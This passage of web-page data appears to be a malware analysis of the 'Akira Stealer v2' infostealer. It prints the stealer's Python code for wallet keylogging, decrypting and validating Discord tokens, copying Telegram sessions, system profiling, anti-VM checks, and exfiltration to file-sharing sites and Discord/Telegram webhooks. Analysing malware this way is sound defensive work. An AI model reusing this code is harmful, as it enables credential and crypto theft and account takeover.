self.wallet_titles):\n",[102,12358,12359],{"class":104,"line":9025},[102,12360,12361],{}," if event.name == 'enter':\n",[102,12363,12364],{"class":104,"line":9031},[102,12365,12366],{}," data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[102,12368,12369],{"class":104,"line":9037},[102,12370,12371],{}," send_to_webhook(data)\n",[102,12373,12374],{"class":104,"line":9043},[102,12375,12376],{}," self.buf = \"\"\n",[102,12378,12379],{"class":104,"line":9049},[102,12380,12381],{}," else:\n",[102,12383,12384],{"class":104,"line":9055},[102,12385,12386],{}," self.buf += event.name\n",[1255,12388,12389,12395],{},[1258,12390,12391,12394],{},[251,12392,12393],{},"Trigger list",": Window titles including “MetaMask”, “Phantom”, “Atomic Wallet”, etc.",[1258,12396,12397,12400],{},[251,12398,12399],{},"Clipboard",": Captures copied seeds or private keys.",[186,12402,12404],{"id":12403},"_786-packaging-exfiltration","7.8.6 Packaging & Exfiltration",[12,12406,192],{},[12,12408,12409],{},"After collecting browser data, credentials, wallet information, and tokens, Akira proceeds to consolidate and exfiltrate the loot in a highly automated and stealthy manner. This stage marks the final step in the infection chain, and it’s optimized for reliability and minimal forensic footprint. First, all collected data—including browser dumps, logs, and keylogged wallet information—is compressed into a ZIP archive. This ensures the full dataset can be transferred as a single payload. The archive is then uploaded to multiple public file-sharing services such as GoFile, File.io, or Oshi.at, depending on availability. These platforms provide anonymous, temporary hosting, and are often used to bypass corporate firewalls or reputation-based blocking. A structured report is simultaneously generated and sent to the attacker via a Discord or Telegram webhook. It includes summary statistics—how many wallets were found, how many tokens were valid, and a direct link to the stolen data. This gives attackers a quick overview of the target’s value without opening the archive.",[12,12411,12412],{},"Finally, the malware deletes the temporary folder and the archive from disk, effectively removing local forensic evidence. By the time a defender discovers the infection, the data is already gone—and often irretrievable.",[56,12414,12416],{"className":8482,"code":12415,"language":8484,"meta":65,"style":65},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n \"title\": \"💰 Wallet & Token Exfiltration Report\",\n \"fields\": [\n {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n {\"name\": \"Desktop Wallets\", \"value\": data.desktop_wallets_count},\n {\"name\": \"Discord Tokens\", \"value\": len(valid_tokens)},\n {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n {\"name\": \"Archive Link\", \"value\": url or \"[upload failed]\"},\n ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & ZIP\nUtils.clear_client_folder()\n",[63,12417,12418,12423,12428,12433,12438,12443,12448,12453,12458,12463,12468,12473,12478,12483,12488,12492,12497,12502],{"__ignoreMap":65},[102,12419,12420],{"class":104,"line":105},[102,12421,12422],{},"# 1) ZIP everything (including Wallets folder)\n",[102,12424,12425],{"class":104,"line":111},[102,12426,12427],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[102,12429,12430],{"class":104,"line":329},[102,12431,12432],{},"# 2) Attempt upload to primary & fallback services\n",[102,12434,12435],{"class":104,"line":346},[102,12436,12437],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,12439,12440],{"class":104,"line":650},[102,12441,12442],{},"# 3) Report summary\n",[102,12444,12445],{"class":104,"line":656},[102,12446,12447],{},"embed = {\n",[102,12449,12450],{"class":104,"line":662},[102,12451,12452],{}," \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[102,12454,12455],{"class":104,"line":668},[102,12456,12457],{}," \"fields\": [\n",[102,12459,12460],{"class":104,"line":674},[102,12461,12462],{}," {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[102,12464,12465],{"class":104,"line":680},[102,12466,12467],{}," {\"name\": \"Desktop Wallets\", \"value\": data.desktop_wallets_count},\n",[102,12469,12470],{"class":104,"line":9019},[102,12471,12472],{}," {\"name\": \"Discord Tokens\", \"value\": len(valid_tokens)},\n",[102,12474,12475],{"class":104,"line":9025},[102,12476,12477],{}," {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[102,12479,12480],{"class":104,"line":9031},[102,12481,12482],{}," {\"name\": \"Archive Link\", \"value\": url or \"[upload failed]\"},\n",[102,12484,12485],{"class":104,"line":9037},[102,12486,12487],{}," ]\n",[102,12489,12490],{"class":104,"line":9043},[102,12491,6410],{},[102,12493,12494],{"class":104,"line":9049},[102,12495,12496],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[102,12498,12499],{"class":104,"line":9055},[102,12500,12501],{},"# 4) Cleanup local folder & ZIP\n",[102,12503,12504],{"class":104,"line":9061},[102,12505,11688],{},[41,12507,12509,12510,1289],{"id":12508},"_79-discord-and-telegram-token-theft-class-discord","7.9. Discord and Telegram Token Theft (Class: ",[63,12511,5337],{},[12,12513,47],{},[12,12515,12516,12517,12519],{},"Akira Stealer v2’s ",[251,12518,5337],{}," class executes a highly parallelized, multi-stage process to harvest both Discord authorization tokens and Telegram session data. Below, we dissect each component with precise code references and illustrative examples.",[186,12521,12523],{"id":12522},"_791-initialization-path-enumeration","7.9.1 Initialization & Path Enumeration",[12,12525,192],{},[12,12527,12528],{},"Upon instantiation, the constructor builds two sets of target paths:",[56,12530,12532],{"className":8482,"code":12531,"language":8484,"meta":65,"style":65},"# Discord client LevelDB directories\ndiscord_paths = [\n [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n ...\n]\n",[63,12533,12534,12539,12544,12549,12554,12558,12562,12566,12571,12576,12581,12586,12590],{"__ignoreMap":65},[102,12535,12536],{"class":104,"line":105},[102,12537,12538],{},"# Discord client LevelDB directories\n",[102,12540,12541],{"class":104,"line":111},[102,12542,12543],{},"discord_paths = [\n",[102,12545,12546],{"class":104,"line":329},[102,12547,12548],{}," [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[102,12550,12551],{"class":104,"line":346},[102,12552,12553],{}," [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[102,12555,12556],{"class":104,"line":650},[102,12557,7836],{},[102,12559,12560],{"class":104,"line":656},[102,12561,11913],{},[102,12563,12564],{"class":104,"line":662},[102,12565,7846],{"emptyLinePlaceholder":2180},[102,12567,12568],{"class":104,"line":668},[102,12569,12570],{},"# Chromium-based browser LevelDB directories\n",[102,12572,12573],{"class":104,"line":674},[102,12574,12575],{},"browserPaths = [\n",[102,12577,12578],{"class":104,"line":680},[102,12579,12580],{}," [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[102,12582,12583],{"class":104,"line":9019},[102,12584,12585],{}," [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[102,12587,12588],{"class":104,"line":9025},[102,12589,7836],{},[102,12591,12592],{"class":104,"line":9031},[102,12593,11913],{},[1255,12595,12596,12605],{},[1258,12597,12598,12601,12602,1014],{},[251,12599,12600],{},"Discord Paths"," target official and unofficial Discord clients under ",[63,12603,12604],{},"%APPDATA%",[1258,12606,12607,12610],{},[251,12608,12609],{},"Browser Paths"," cover popular browsers’ user data folders, including subfolders for local storage and extensions.",[12,12612,12613],{},"Threads are spawned for each entry:",[56,12615,12617],{"className":8482,"code":12616,"language":8484,"meta":65,"style":65},"for patt in browserPaths:\n t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n t.start()\nfor patt in discord_paths:\n t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n t.start()\n",[63,12618,12619,12624,12629,12634,12639,12644],{"__ignoreMap":65},[102,12620,12621],{"class":104,"line":105},[102,12622,12623],{},"for patt in browserPaths:\n",[102,12625,12626],{"class":104,"line":111},[102,12627,12628],{}," t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[102,12630,12631],{"class":104,"line":329},[102,12632,12633],{}," t.start()\n",[102,12635,12636],{"class":104,"line":346},[102,12637,12638],{},"for patt in discord_paths:\n",[102,12640,12641],{"class":104,"line":650},[102,12642,12643],{}," t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[102,12645,12646],{"class":104,"line":656},[102,12647,12633],{},[12,12649,12650],{},"This threading model maximizes I/O throughput, probing dozens of directories concurrently.",[186,12652,12654],{"id":12653},"_792-token-extraction-logic","7.9.2 Token Extraction Logic",[12,12656,192],{},[12,12658,12659],{},[251,12660,12661],{},"Plaintext Token Scraping from Browsers",[12,12663,12664,12667,12668,4598,12671,12674],{},[63,12665,12666],{},"get_btoken(path, arg)"," navigates to each LevelDB folder and inspects ",[63,12669,12670],{},".log",[63,12672,12673],{},".ldb"," files:",[56,12676,12678],{"className":8482,"code":12677,"language":8484,"meta":65,"style":65},"for file in os.listdir(path + arg):\n if file.endswith((\".log\", \".ldb\")):\n for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n tokens = re.findall(regex, line)\n for token in tokens:\n self.tokens.append(token)\n self.cehckToken(token)\n",[63,12679,12680,12685,12690,12695,12700,12705,12710,12715],{"__ignoreMap":65},[102,12681,12682],{"class":104,"line":105},[102,12683,12684],{},"for file in os.listdir(path + arg):\n",[102,12686,12687],{"class":104,"line":111},[102,12688,12689],{}," if file.endswith((\".log\", \".ldb\")):\n",[102,12691,12692],{"class":104,"line":329},[102,12693,12694],{}," for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[102,12696,12697],{"class":104,"line":346},[102,12698,12699],{}," for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[102,12701,12702],{"class":104,"line":650},[102,12703,12704],{}," tokens = re.findall(regex, line)\n",[102,12706,12707],{"class":104,"line":656},[102,12708,12709],{}," for token in tokens:\n",[102,12711,12712],{"class":104,"line":662},[102,12713,12714],{}," self.tokens.append(token)\n",[102,12716,12717],{"class":104,"line":668},[102,12718,12719],{}," self.cehckToken(token)\n",[1255,12721,12722,12731,12739],{},[1258,12723,12724,12730],{},[251,12725,12726,12727],{},"Regex ",[63,12728,12729],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," matches standard Discord tokens.",[1258,12732,12733,12738],{},[251,12734,12726,12735],{},[63,12736,12737],{},"mfa\\.[\\w-]{80,95}"," captures MFA tokens.",[1258,12740,12741,12742,12745],{},"Deduplication is implicit: tokens stored in ",[63,12743,12744],{},"self.tokens"," before validation.",[12,12747,12748],{},[251,12749,12750],{},"Encrypted Token Decryption in Discord Client",[12,12752,12753,12754,12756,12757,12759,12760,12763],{},"Discord’s client encrypts Local Storage entries under DPAPI, prefaced by ",[63,12755,10491],{}," or ",[63,12758,10494],{},". ",[63,12761,12762],{},"get_discord(path, arg)"," handles this:",[56,12765,12767],{"className":8482,"code":12766,"language":8484,"meta":65,"style":65},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n if file.endswith((\".log\", \".ldb\")):\n for line in open(f\"{path}{arg}/{file}\"):\n for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n ciphertext = b64decode(token_part)\n token = self.decrypt_value(ciphertext, master_key)\n self.tokens.append(token)\n self.cehckToken(token)\n",[63,12768,12769,12774,12779,12783,12788,12793,12797,12802,12806,12810,12815,12820,12825,12830,12835],{"__ignoreMap":65},[102,12770,12771],{"class":104,"line":105},[102,12772,12773],{},"# Read Local State to obtain encrypted master key\n",[102,12775,12776],{"class":104,"line":111},[102,12777,12778],{},"with open(path + \"/Local State\", 'r') as f:\n",[102,12780,12781],{"class":104,"line":329},[102,12782,11089],{},[102,12784,12785],{"class":104,"line":346},[102,12786,12787],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[102,12789,12790],{"class":104,"line":650},[102,12791,12792],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[102,12794,12795],{"class":104,"line":656},[102,12796,7846],{"emptyLinePlaceholder":2180},[102,12798,12799],{"class":104,"line":662},[102,12800,12801],{},"# Iterate LevelDB files for Base64 payloads\n",[102,12803,12804],{"class":104,"line":668},[102,12805,12684],{},[102,12807,12808],{"class":104,"line":674},[102,12809,12689],{},[102,12811,12812],{"class":104,"line":680},[102,12813,12814],{}," for line in open(f\"{path}{arg}/{file}\"):\n",[102,12816,12817],{"class":104,"line":9019},[102,12818,12819],{}," for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[102,12821,12822],{"class":104,"line":9025},[102,12823,12824],{}," ciphertext = b64decode(token_part)\n",[102,12826,12827],{"class":104,"line":9031},[102,12828,12829],{}," token = self.decrypt_value(ciphertext, master_key)\n",[102,12831,12832],{"class":104,"line":9037},[102,12833,12834],{}," self.tokens.append(token)\n",[102,12836,12837],{"class":104,"line":9043},[102,12838,12839],{}," self.cehckToken(token)\n",[1255,12841,12842,12851],{},[1258,12843,12844,12847,12848,12850],{},[251,12845,12846],{},"Master Key Recovery",": Strips the 5-byte DPAPI header, then calls ",[63,12849,11155],{}," (wrapping Windows DPAPI) to decrypt the AES-GCM key.",[1258,12852,12853,12856,12857,12860,12861,12864,12865],{},[251,12854,12855],{},"Payload Parsing",": Tokens are prefixed with ",[63,12858,12859],{},"dQw4w9WgXcQ:"," (an attacker-chosen marker). After Base64 decoding, ",[63,12862,12863],{},"decrypt_value()"," splits IV and ciphertext:",[56,12866,12868],{"className":8482,"code":12867,"language":8484,"meta":65,"style":65},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[63,12869,12870,12875,12880,12885,12890],{"__ignoreMap":65},[102,12871,12872],{"class":104,"line":105},[102,12873,12874],{},"def decrypt\\_value(buff, master\\_key):\n",[102,12876,12877],{"class":104,"line":111},[102,12878,12879],{},"iv = buff\\[3:15]\n",[102,12881,12882],{"class":104,"line":329},[102,12883,12884],{},"payload = buff\\[15:]\n",[102,12886,12887],{"class":104,"line":346},[102,12888,12889],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[102,12891,12892],{"class":104,"line":650},[102,12893,12894],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[186,12896,12898],{"id":12897},"_793-token-validation-exfiltration","7.9.3 Token Validation & Exfiltration",[12,12900,192],{},[12,12902,12903],{},"Each extracted token is validated via live API call:",[56,12905,12908],{"className":12906,"code":12907,"language":61},[59],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n self.cehckToken(token)\n",[63,12909,12907],{"__ignoreMap":65},[1255,12911,12912],{},[1258,12913,12914,805,12917,12920,12921,12924,12925],{},[251,12915,12916],{},"On success",[63,12918,12919],{},"cehckToken()"," determines whether to send via Telegram (",[63,12922,12923],{},"useTg=True",") or Discord webhook:",[56,12926,12928],{"className":8482,"code":12927,"language":8484,"meta":65,"style":65},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[63,12929,12930,12935,12940,12945],{"__ignoreMap":65},[102,12931,12932],{"class":104,"line":105},[102,12933,12934],{},"if useTg:\n",[102,12936,12937],{"class":104,"line":111},[102,12938,12939],{},"self.sendTokenTg(token)\n",[102,12941,12942],{"class":104,"line":329},[102,12943,12944],{},"else:\n",[102,12946,12947],{"class":104,"line":346},[102,12948,12949],{},"self.send\\_embed(token)\n",[1255,12951,12952],{},[1258,12953,12954,12959],{},[251,12955,12956],{},[63,12957,12958],{},"send_embed"," crafts a rich Discord embed containing user metadata (username, discriminator, email, Nitro status, billing info) using fields from",[56,12961,12964],{"className":12962,"code":12963,"language":61},[59],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[63,12965,12963],{"__ignoreMap":65},[1255,12967,12968],{},[1258,12969,12970,12975],{},[251,12971,12972],{},[63,12973,12974],{},"sendTokenTg"," sends a plain-text summary over Telegram API.",[186,12977,12979],{"id":12978},"_794-telegram-session-harvesting","7.9.4 Telegram Session Harvesting",[12,12981,192],{},[12,12983,12984],{},"Beyond Discord tokens, the stealer grabs Telegram Desktop sessions:",[56,12986,12988],{"className":8482,"code":12987,"language":8484,"meta":65,"style":65},"@staticmethod\ndef steal_telegram():\n src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n Utils.TaskKill(\"telegram.exe\")\n shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[63,12989,12990,12994,12999,13004,13009],{"__ignoreMap":65},[102,12991,12992],{"class":104,"line":105},[102,12993,8971],{},[102,12995,12996],{"class":104,"line":111},[102,12997,12998],{},"def steal_telegram():\n",[102,13000,13001],{"class":104,"line":329},[102,13002,13003],{}," src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[102,13005,13006],{"class":104,"line":346},[102,13007,13008],{}," Utils.TaskKill(\"telegram.exe\")\n",[102,13010,13011],{"class":104,"line":650},[102,13012,13013],{}," shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[1255,13015,13016,13022,13031],{},[1258,13017,13018,13021],{},[251,13019,13020],{},"Process Termination",": Ensures file locks are released.",[1258,13023,13024,13027,13028,13030],{},[251,13025,13026],{},"Recursive Copy",": Steals ",[63,13029,12264],{}," folder, including user sessions, contacts, and cached messages.",[1258,13032,13033,13035,13036,13039],{},[251,13034,5353],{},": The stolen folder is zipped and uploaded via ",[63,13037,13038],{},"sendFilesTG()",", with the download link embedded in a Telegram message.",[12,13041,13042,13043,13045],{},"Akira Stealer’s ",[63,13044,5337],{}," module combines regex-based scraping, DPAPI-backed AES-GCM decryption, live API validation, and multi-protocol exfiltration (webhook + Telegram) to deliver a seamless account takeover capability across both Discord and Telegram platforms.",[41,13047,13049],{"id":13048},"_710-system-profiling","7.10 System Profiling",[12,13051,47],{},[12,13053,13054,13055,13058],{},"Akira Stealer v2 incorporates an extensive system profiling phase to gather host metadata, environment attributes, and network details. This information is collated in the ",[63,13056,13057],{},"Data"," class and later packaged with exfiltrated credentials. Below, we break down the profiling logic with direct code references.",[186,13060,13062,13063,13065],{"id":13061},"_7101-data-class-initialization","7.10.1 ",[63,13064,13057],{}," Class Initialization",[12,13067,192],{},[12,13069,13070,13071,13073],{},"On startup, an instance of ",[63,13072,13057],{}," is created:",[56,13075,13077],{"className":8482,"code":13076,"language":8484,"meta":65,"style":65},"class Data:\n def __init__(self):\n self.username = os.getlogin()\n self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n ...\n self.ip = requests.get(url=\"https://api.ipify.org\").text\n ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n self.country = ipdata.get(\"country\")\n self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[63,13078,13079,13084,13089,13094,13099,13104,13109,13114,13119,13124],{"__ignoreMap":65},[102,13080,13081],{"class":104,"line":105},[102,13082,13083],{},"class Data:\n",[102,13085,13086],{"class":104,"line":111},[102,13087,13088],{}," def __init__(self):\n",[102,13090,13091],{"class":104,"line":329},[102,13092,13093],{}," self.username = os.getlogin()\n",[102,13095,13096],{"class":104,"line":346},[102,13097,13098],{}," self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[102,13100,13101],{"class":104,"line":650},[102,13102,13103],{}," self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[102,13105,13106],{"class":104,"line":656},[102,13107,13108],{}," ...\n",[102,13110,13111],{"class":104,"line":662},[102,13112,13113],{}," self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[102,13115,13116],{"class":104,"line":668},[102,13117,13118],{}," ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[102,13120,13121],{"class":104,"line":674},[102,13122,13123],{}," self.country = ipdata.get(\"country\")\n",[102,13125,13126],{"class":104,"line":680},[102,13127,13128],{}," self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[1255,13130,13131,13144],{},[1258,13132,13133,13136,13137,4598,13140,13143],{},[251,13134,13135],{},"Username & Hostname:"," Retrieved via ",[63,13138,13139],{},"os.getlogin()",[63,13141,13142],{},"COMPUTERNAME"," environment variable.",[1258,13145,13146,13149,13150,13153,13154,13156],{},[251,13147,13148],{},"IP Address:"," Fetched with ",[63,13151,13152],{},"requests.get(\"https://api.ipify.org\")",", then geolocated via ",[63,13155,9317],{}," for country and ISO code.",[186,13158,13160],{"id":13159},"_7102-os-and-hardware-enumeration","7.10.2 OS and Hardware Enumeration",[12,13162,192],{},[12,13164,13165],{},"Using Windows Management Instrumentation (WMI) commands:",[56,13167,13169],{"className":8482,"code":13168,"language":8484,"meta":65,"style":65},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[63,13170,13171,13176,13181,13186,13191,13196,13201,13206,13211,13216,13221,13226],{"__ignoreMap":65},[102,13172,13173],{"class":104,"line":105},[102,13174,13175],{},"# Operating System\n",[102,13177,13178],{"class":104,"line":111},[102,13179,13180],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[102,13182,13183],{"class":104,"line":329},[102,13184,13185],{},"# Total Physical Memory\n",[102,13187,13188],{"class":104,"line":346},[102,13189,13190],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[102,13192,13193],{"class":104,"line":650},[102,13194,13195],{},"# BIOS UUID\n",[102,13197,13198],{"class":104,"line":656},[102,13199,13200],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[102,13202,13203],{"class":104,"line":662},[102,13204,13205],{},"# CPU Identifier\n",[102,13207,13208],{"class":104,"line":668},[102,13209,13210],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[102,13212,13213],{"class":104,"line":674},[102,13214,13215],{},"# GPU Name\n",[102,13217,13218],{"class":104,"line":680},[102,13219,13220],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[102,13222,13223],{"class":104,"line":9019},[102,13224,13225],{},"# Windows Product Key\n",[102,13227,13228],{"class":104,"line":9025},[102,13229,13230],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[12,13232,13233,13234,13237],{},"Results are parsed to human-readable strings (",[63,13235,13236],{},"strip()",", index operations) and concatenated into:",[56,13239,13241],{"className":8482,"code":13240,"language":8484,"meta":65,"style":65},"self.system_info = (\n f\"Computer Name: {self.computerName}\\n\"\n f\"Total Memory: {self.totalMemory}\\n\"\n f\"CPU: {self.cpu}\\n\"\n f\"GPU: {self.gpu}\\n\"\n f\"Product Key: {self.productKey}\"\n)\n",[63,13242,13243,13248,13253,13258,13263,13268,13273],{"__ignoreMap":65},[102,13244,13245],{"class":104,"line":105},[102,13246,13247],{},"self.system_info = (\n",[102,13249,13250],{"class":104,"line":111},[102,13251,13252],{}," f\"Computer Name: {self.computerName}\\n\"\n",[102,13254,13255],{"class":104,"line":329},[102,13256,13257],{}," f\"Total Memory: {self.totalMemory}\\n\"\n",[102,13259,13260],{"class":104,"line":346},[102,13261,13262],{}," f\"CPU: {self.cpu}\\n\"\n",[102,13264,13265],{"class":104,"line":650},[102,13266,13267],{}," f\"GPU: {self.gpu}\\n\"\n",[102,13269,13270],{"class":104,"line":656},[102,13271,13272],{}," f\"Product Key: {self.productKey}\"\n",[102,13274,13275],{"class":104,"line":662},[102,13276,9238],{},[186,13278,13280],{"id":13279},"_7103-vm-detection-anti-sandbox-checks","7.10.3 VM Detection & Anti-Sandbox Checks",[12,13282,192],{},[12,13284,13285,13286,13288],{},"Before deep profiling, the malware invokes ",[63,13287,8655],{}," to detect virtualization or analysis environments:",[56,13290,13292],{"className":8482,"code":13291,"language":8484,"meta":65,"style":65},"if VmProtect.isVM(1):\n sys.exit()\n",[63,13293,13294,13299],{"__ignoreMap":65},[102,13295,13296],{"class":104,"line":105},[102,13297,13298],{},"if VmProtect.isVM(1):\n",[102,13300,13301],{"class":104,"line":111},[102,13302,13303],{}," sys.exit()\n",[12,13305,13306],{},"Key checks include:",[1255,13308,13309,13315,13321,13327],{},[1258,13310,13311,13314],{},[251,13312,13313],{},"Registry Keys & Driver Descriptors",": Queries virtualization-related registry entries.",[1258,13316,13317,13320],{},[251,13318,13319],{},"Blacklisted UUIDs & Computer Names",": Matches against known VM fingerprints.",[1258,13322,13323,13326],{},[251,13324,13325],{},"HTTP Simulation",": Attempts to connect to a nonexistent domain under HTTPS.",[1258,13328,13329,13332,13333,805,13336,805,13339,1014],{},[251,13330,13331],{},"Process Blacklist",": Spawns a background thread to kill tools like ",[63,13334,13335],{},"wireshark",[63,13337,13338],{},"ollydbg",[63,13340,13341],{},"ida64",[186,13343,13345],{"id":13344},"_7104-packaging-transmission","7.10.4 Packaging & Transmission",[12,13347,192],{},[12,13349,13350,13351,13354],{},"The collected ",[63,13352,13353],{},"system_info",", IP, and country flag are embedded in the webhook payload headers:",[56,13356,13358],{"className":8482,"code":13357,"language":8484,"meta":65,"style":65},"webhook_payload = {\n \"embeds\": [{\n \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n \"fields\": [...]\n }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[63,13359,13360,13365,13370,13375,13380,13385,13390,13394],{"__ignoreMap":65},[102,13361,13362],{"class":104,"line":105},[102,13363,13364],{},"webhook_payload = {\n",[102,13366,13367],{"class":104,"line":111},[102,13368,13369],{}," \"embeds\": [{\n",[102,13371,13372],{"class":104,"line":329},[102,13373,13374],{}," \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[102,13376,13377],{"class":104,"line":346},[102,13378,13379],{}," \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[102,13381,13382],{"class":104,"line":650},[102,13383,13384],{}," \"fields\": [...]\n",[102,13386,13387],{"class":104,"line":656},[102,13388,13389],{}," }]\n",[102,13391,13392],{"class":104,"line":662},[102,13393,6410],{},[102,13395,13396],{"class":104,"line":668},[102,13397,13398],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[1255,13400,13401,13407],{},[1258,13402,13403,13406],{},[251,13404,13405],{},"Flag Emoji",": Derived from ISO country code.",[1258,13408,13409,13412],{},[251,13410,13411],{},"Fields",": Include counts of stolen passwords, cookies, etc., but the system info is in the embed description for immediate context.",[12,13414,13415,13418],{},[251,13416,13417],{},"Summary:","\nSystem profiling in Akira Stealer v2 gathers comprehensive host and network data via WMI commands, environment variables, and IP geolocation. Coupled with VM detection and tool-killing routines, this ensures the attacker has a full snapshot of the compromised environment, enhancing targeted follow-up actions and filtering out analysis sandboxes.",[41,13420,13422,13423,1289],{"id":13421},"_711-file-grabber-class-utilssteal_files","7.11 File Grabber (Class: ",[63,13424,13425],{},"Utils.steal_files",[12,13427,47],{},[12,13429,13430],{},"Beyond browser data and tokens, Akira also attempts to extract valuable user-generated content—such as documents, spreadsheets, private notes, and cryptographic key files. The File Grabber module is responsible for this task. It operates by scanning high-value directories for common file types and patterns, then silently adding them to the exfiltration bundle. What makes this module especially dangerous is its simplicity and focus: it doesn’t attempt to crawl the entire file system. Instead, it targets specific, high-probability locations where sensitive files are typically stored. These include the Desktop, Documents, Downloads, and OneDrive directories—each relative to the user's home path. This focused approach improves both speed and stealth, reducing the likelihood of detection during the scan. It also avoids alerting the user by not accessing system or protected directories. Once files of interest are located, they are copied into a temporary folder, optionally renamed or grouped, and later compressed into the final ZIP archive that’s uploaded in the exfiltration 